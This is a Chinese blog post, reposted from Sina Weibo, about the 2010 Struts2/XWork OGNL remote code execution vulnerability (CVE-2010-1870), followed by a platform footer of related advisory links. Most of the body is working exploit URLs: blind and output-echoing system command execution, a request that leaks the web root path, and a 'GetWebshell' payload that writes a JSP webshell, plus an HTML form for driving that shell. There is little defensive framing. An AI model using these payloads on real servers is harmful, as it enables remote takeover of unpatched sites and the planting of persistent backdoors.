Struts2/XWork远程执行任意代码漏洞

最新推荐文章于 2014-06-12 10:07:29 发布
最新推荐文章于 2014-06-12 10:07:29 发布
阅读量1.9k 收藏
点赞数
分类专栏: Java技术
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qm4050/article/details/8621099
版权

前段时间遇到黑客,才知道这个问题,找了一些资料了解一下


通过修改一些值能够调用被保护的Java代码,并且执行任意的Java代码:
#_memberAccess['allowStaticMethodAccess'] = true
#foo = new java .lang.Boolean("false")
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec('mkdir /tmp/PWNED')
通过构造http请求能够调用该OGNL的表达式,这个漏洞的PoC于2010年7月12日发布。

十六进制 \u0023    或 八进制 \43      转义为#

不可回显EXP
http://Domain/[filename].action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew java.lang.Boolean("false")))&(asdf)(('\u0023rt.exec("系统命令")')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

可回显EXP
http://Domain/[filename].action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\' 系统命令\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))

网站路径
http://Domain/[filename].action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43x\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43x\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43x.getWriter().println(\43req.getRealPath("\u005c"))')(d))&(i99)(('\43x.getWriter().close()')(d))

GetWebshell
http://Domain/[filename].action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew java.lang.Boolean("false")))&(adsdf)((@java.lang.System@err.close()))&(asdf)((\u0023rt\u003d@java.lang.System@setErr(new java.io.PrintStream(new java.io.File(@java.net.URLDecoder@decode(@ognl.Ognl@class.getResource('/').getFile())).getParentFile().getParent()+'/1.jsp')))(@java.lang.System@err.println("\u003c\u0025java.io.FileWriter w \u003d new java.io.FileWriter(application.getRealPath(\"2.jsp\"));w.write(request.getParameter(\"c\"));w.close();\u0025\u003e")))=1
由于新浪微博过滤问题,原来的 % 2 b (无空格)已经被转化成 + ,修改回来即可。
<form name=get method=post>
<input name=url size=100 type=text value=http://>
<input type=button οnclick="javascript:get.action=document.get.url.value;get.submit()" value=ok>
<br><textarea name=c rows=20 cols=100></textarea><br>
</form>

以上来自新浪


qm4050
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XWork绕过安全限制执行任意命令漏洞补丁
08-20
CVE ID: CVE-2010-1870 XWork是一个命令模式框架,用于支持Struts 2及其他应用。 XWork处理用户请求参数数据时存在漏洞远程攻击者可以利用此漏洞在系统上执行任意命令Struts2中WebWork框架使用XWork基于HTTP参数名执行操作和调用,将每个HTTP参数名处理为OGNL(对象图形导航语言)语句,而OGNL将: user.address.city=Bishkek&user['favoriteDrink']=kumys 转换为: action.getUser().getAddress().setCity("Bishkek") action.getUser().setFavoriteDrink("kumys") 这是通过ParametersInterceptor来执行的,使用用户提供的HTTP参数调用ValueStack.setValue()。 除了获取和设置属性外,OGNL还支持其他一些功能: * 方法调用:foo() * 静态方式调用: @java.lang.System@exit(1) * 构建函数调用:new MyClass() * 处理上下文变量:#foo = new MyClass() 由于HTTP参数名为OGNL语句,为了防范攻击者通过HTTP参数调用任意方式,XWork使用了以下两个变量保护方式的执行: * OgnlContext的属性xwork.MethodAccessor.denyMethodExecution(默认设置为true) * SecurityMemberAccess私有字段allowStaticMethodAccess(默认设置为false) 为了方便开发人员访问各种常用的对象,XWork提供了一些预定义的上下文变量: * #application * #session * #request * #parameters * #attr * #context * #_memberAccess * #root * #this * #_typeResolver * #_classResolver * #_traceEvaluations * #_lastEvaluation * #_keepLastEvaluation 这些变量代表各种服务器端对象。为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值: #_memberAccess['allowStaticMethodAccess'] = true #foo = new java .lang.Boolean("false") #context['xwork.MethodAccessor.denyMethodExecution'] = #foo #rt = @java.lang.Runtime@getRuntime() #rt.exec('mkdir /tmp/PWNED')
Struts2/XWork < 2.2.0远程执行任意代码漏洞分析及修补
JAVA
07-27 272
1.exploit-db网站在7月14日爆出了一个Struts2远程执行任意代码漏洞,此漏洞危害之大,可谓百发百中,直接root,只要采用了Struts2和webwork框架的系统(对于webwork的版本,不太清楚,我这里没环境对其一一测试,这里有两者关系的介绍),基本上无一幸免。 2.昨天在接到朋友的提醒后,迅速将公司的一些使用此框架开发的项目漏洞修补了,我想大部分大公司的也在第一时...
struts2/xwork漏洞
06-12 159
介绍struts2/xwork的Remote Command Execution Vulnerability漏洞,剖析了原因并供给了处理方法,能够拜见http://my-corner.iteye.com/blog/720209 去struts官网逛了一下,发现第一种处理方法晋级到struts2.2版别(当时的最新版),最终仍是没有彻底处理该疑问。当前,需求处理该疑问需求更新至2.3.1.2或
Struts2/XWork 安全漏洞及解决办法
iteye_8053的博客
07-26 149
exploit-db网站在7月14日爆出了一个Struts2远程执行任意代码漏洞漏洞名称:Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability 相关介绍: http://www.exploit-db.com/exploits/14360/ http://sebug.net/exploit/19954/ ...
Struts2安全漏洞(转载绿盟)
iteye_18492的博客
07-19 228
XWork ParameterInterceptor类绕过安全限制漏洞 受影响系统: OpenSymphony XWork &lt; 2.2.0Apache Group Struts &lt; 2.2.0 描述: CVE ID: CVE-2010-1870XWork是一个命令模式框架,用于支持Struts 2及其他应用。 Struts2中WebWork框架使用XWork基于HTTP参数名...
Struts2 S2-029远程代码执行漏洞初探1
最新发布
08-08
Struts2 S2-029 远程代码执行漏洞初探 Struts2 是一个基于 Java 的 Web 框架,使用 OGNL 表达式来访问 ActionContext 中的对象数据。在 Struts2 中,标签库使用 OGNL 表达式来获取对象数据,例如 `...
Struts2和Webwork远程命令执行漏洞分析1
08-08
Struts2和Webwork远程命令执行漏洞主要源于Apache Struts2框架中的一个设计缺陷,该框架使用OGNL(Object-Graph Navigation Language)表达式来处理用户输入,这为恶意攻击者提供了可乘之机。该漏洞发生在Struts2的...
struts2漏洞分析
09-15
总的来说,Struts2的安全漏洞警示我们,虽然框架提供了强大的功能,但同时也需要谨慎对待这些功能,尤其是涉及到数据和代码执行的部分。开发者应当始终保持警惕,及时更新框架,并采取必要的安全措施来保护应用免受...
struts2漏洞列表
12-02
然而,Struts2在历史上存在一系列的安全漏洞,这些漏洞可能导致严重的安全风险,如远程代码执行、信息泄露等。以下是对几个重要漏洞的详细解释: 1. **S2-001 - OGNL注入漏洞** 这个漏洞主要由于Struts2的`...
xwork帮助文档
08-15
xwork帮助文档
XWork ParameterInterceptor类绕过安全限制漏洞-解决1
weixin_33709219的博客
07-19 127
这个问题是如何发生的呢?下面深入看看: ? Struts2官方站点提供的Struts 2 的整体结构   一个请求在Struts2框架中的处理大概分为以下几个步骤: Struts2框架的调用流程: 1、当Servlet容器接收到一个请求后,将请求交给你在web.xml中配置的过滤器FilterDispatcher,调...
XWork ParameterInterceptor类绕过安全限制漏洞-描述
weixin_33721344的博客
07-19 335
      ? XWork ParameterInterceptor类绕过安全限制漏洞     问题描述:     XWork ParameterInterceptor类绕过安全限制漏洞         发布日期:2010-07-09     更新日期:2010-07-15         受影响系统:   ...
XWork ParameterInterceptor类绕过安全限制漏洞-解决2
weixin_33937499的博客
07-19 193
OK,问题找到了,其实这个问题,在2008年有类似描述:http://www.hacker.cn/News/ldgg/2008-11-7/08117107B0EE.shtml ActionContext ac = invocation.getInvocationContext(); Map parameters = ac.getParameters(); 事实上,随着项目应用的广泛,参数的多...
Apache Struts2 XWork绕过安全限制执行任意命令漏洞是否在Struts1中存在
大哲
08-12 474
Apache Struts2 XWork绕过安全限制执行任意命令漏洞 发布日期:2010-07-09更新日期:2010-07-15受影响系统: OpenSymphony XWork &lt; 2.2.0Apache Group Struts &lt; 2.2.0 描述: BUGTRAQ ID: 41592CVE ID: CVE-2010-1870    有哪位大侠知...
Apache Struts2 多个前缀参数远程命令执行漏洞及测试方法
xiaoguang0904的专栏
08-10 1985
受影响的软件及系统: ==================== Apache Struts 2.0.0 - Apache Struts 2.3.15 未受影响的软件及系统: ====================== Apache Struts 2.3.15.1及以上版本 综述: ====== Apache Struts2在处理action、redirect、和redir
Struts2/XWork 安全漏洞及解决办法(了解)
cgh4752423的专栏
09-19 649
exploit-db网站在7月14日爆出了一个Struts2远程执行任意代码漏洞漏洞名称:Struts2/XWork 相关介绍: http://www.exploit-db.com/exploits/14360/http://sebug.net/exploit/19954/ Struts2的核心是使用的webwork框架,处理 action时通过调用底层的getter/
Struts2与XWork2交互解析及Struts1.0原理
Action类可以利用Struts2的拦截器链来执行预处理和后处理操作,如权限验证、日志记录等,这极大地提高了代码的复用性和可维护性。 此外,Struts2不再局限于JSP作为视图层技术,它支持FreeMarker、Velocity等模板...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值